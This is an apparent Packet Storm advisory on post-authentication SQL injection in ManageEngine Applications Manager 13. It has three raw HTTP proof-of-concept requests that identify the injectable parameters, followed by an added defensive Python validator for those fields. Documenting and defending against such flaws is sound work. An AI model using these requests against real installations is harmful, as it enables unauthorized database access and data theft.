Zoho ManageEngine Applications Manager 13 SQL Injection

2017-11-06T00:00:00
ID PACKETSTORM:144892
Type packetstorm
Reporter Cody Sixteen
Modified 2017-11-06T00:00:00

Description

                                        
ManageEngine Applications Manager version 13 suffers from multiple post-authentication SQL injection vulnerabilities.
  
  
Proof of Concept 1 (name= parameter is susceptible):  
  
POST /manageApplications.do?method=insert HTTP/1.1  
Host: 192.168.1.190:9090  
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,pl;q=0.7,en;q=0.3  
Accept-Encoding: gzip, deflate  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 407  
Referer: http://192.168.1.190:9090/admin/createapplication.do?method=createapp&grouptype=1  
Cookie: testcookie=; am_username=; am_check=; liveapm-_zldp=IEKA1hnqJESNNXc4I4Ts1omY%2FiCOo47Ch6sZEoC7bRr4SfuGTOVfjv2JZAH6cun8; liveapm-_zldt=cfa03604-1dc4-4155-86f7-803952114141; diagnosticsAlarmTable_sortdir=down; JSESSIONID_APM_9090=A16B99B2C0C09EB6060B4372660CFBC3  
Connection: close  
Upgrade-Insecure-Requests: 1  
  
org.apache.struts.taglib.html.TOKEN=66ef9ed22c8b3a67da50e905f7735abd&addmonitors=0&name=My+App2&description=Description....This+service+is+critical+to+our+business&grouptype=1&mgtypestatus%231001=on&mgtypes_1001=1&mgtypes_1007=0&mgtypes_1008=0&mgtypestatus%231002=on&mgtypes_1002=1&mgtypestatus%231003=on&mgtypes_1003=1&mgtypestatus%231004=on&mgtypes_1004=1&mgtypestatus%231006=on&mgtypes_1006=1&locationid=  
  
  
Proof of Concept 2 (crafted viewProps yCanvas field):  
  
POST /GraphicalView.do? HTTP/1.1  
Host: 192.168.1.191:9090  
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0  
Accept: application/json, text/javascript, */*; q=0.01  
Accept-Language: en-US,pl;q=0.7,en;q=0.3  
Accept-Encoding: gzip, deflate  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
X-Requested-With: XMLHttpRequest  
Referer: http://192.168.1.191:9090/GraphicalView.do?&method=createBusinessService  
Content-Length: 457  
Cookie: JSESSIONID_APM_9090=53E8EBC71177607C3A7FE03EB238887E  
Connection: close  
  
&method=saveBusinessViewPropsForADDM&viewProps={"displayProps":{"showLabel":true,"showOnlyMGs":false,"showOnlyTopMGs":false,"showOnlyCritical":false,"showOnlyMGStatus":false,"backgroundColorVal":"#FFFFFF","lineColorVal":"#888c8f","textColorVal":"#444444","lineThickness":"2.5","lineTransparency":1,"xCanvas":-23.089912210349002,"yCanvas":0},"coordinates":"{\"totalNumberOfNodes\":0,\"nodeIdList\":[]}"}&haid=10000106&nodeIdVsResourceId={"node_1":"10000106"}  
  
  
Proof of Concept 3:  
  
POST /GraphicalView.do HTTP/1.1  
Host: 192.168.1.191:9090  
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0  
Accept: application/json, text/javascript, */*; q=0.01  
Accept-Language: en-US,pl;q=0.7,en;q=0.3  
Accept-Encoding: gzip, deflate  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
X-Requested-With: XMLHttpRequest  
Referer: http://192.168.1.191:9090/showapplication.do?haid=10000106&method=showApplication&selectM=flashview&viewid=1  
Content-Length: 101  
Cookie: JSESSIONID_APM_9090=68C19C45D63C6FD102EB3DF25A8CE39D; testcookie=; am_username=; am_check=; am_mgview=availability  
Connection: close  
  
method=getLatestStatusForJIT&haid=10000106&viewid=1&currentime=1509869908111&resourceIDs=(0000106,0)  
  
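A defensive type check for the GraphicalView.do fields shown in Proofs of Concept 2 and 3, as an added example that is not part of the original advisory or the vendor's code. The function names and the type rules (JSON numbers for xCanvas/yCanvas, digits for haid/viewid, a parenthesised digit list for resourceIDs) are assumptions inferred from the sample values in those requests. A filter like this only narrows the input; the fix in the application is parameterized queries, which also covers the free-text name field from Proof of Concept 1.

```python
import json
import re
from urllib.parse import parse_qs

# Assumed type rules, inferred from the benign sample values in the requests above.
DIGITS = re.compile(r"[0-9]{1,15}")
ID_LIST = re.compile(r"\([0-9]{1,15}(,[0-9]{1,15})*\)")
NUMERIC_DISPLAY_PROPS = ("xCanvas", "yCanvas")


def _is_number(value):
    # bool is a subclass of int in Python, so exclude it explicitly.
    return isinstance(value, (int, float)) and not isinstance(value, bool)


def check_graphicalview_body(body):
    """Return reasons to reject a GraphicalView.do form body (empty list = accept)."""
    fields = parse_qs(body, keep_blank_values=True)
    problems = []
    # Every occurrence of a repeated parameter is checked, not just the first.
    for name in ("haid", "viewid"):
        for value in fields.get(name, []):
            if not DIGITS.fullmatch(value):
                problems.append(f"{name}: not an integer")
    for value in fields.get("resourceIDs", []):
        if not ID_LIST.fullmatch(value):
            problems.append("resourceIDs: not a list of integers")
    for raw in fields.get("viewProps", []):
        try:
            props = json.loads(raw)
        except ValueError:
            problems.append("viewProps: malformed JSON")
            continue
        display = props.get("displayProps") if isinstance(props, dict) else None
        if not isinstance(display, dict):
            problems.append("viewProps: displayProps missing")
            continue
        for key in NUMERIC_DISPLAY_PROPS:
            if key in display and not _is_number(display[key]):
                problems.append(f"viewProps.{key}: not a number")
    return problems


if __name__ == "__main__":
    # Constructed sample: yCanvas sent as a string instead of a JSON number.
    sample = 'method=saveBusinessViewPropsForADDM&viewProps={"displayProps":{"xCanvas":1,"yCanvas":"abc"}}&haid=10000106'
    print(check_graphicalview_body(sample))
```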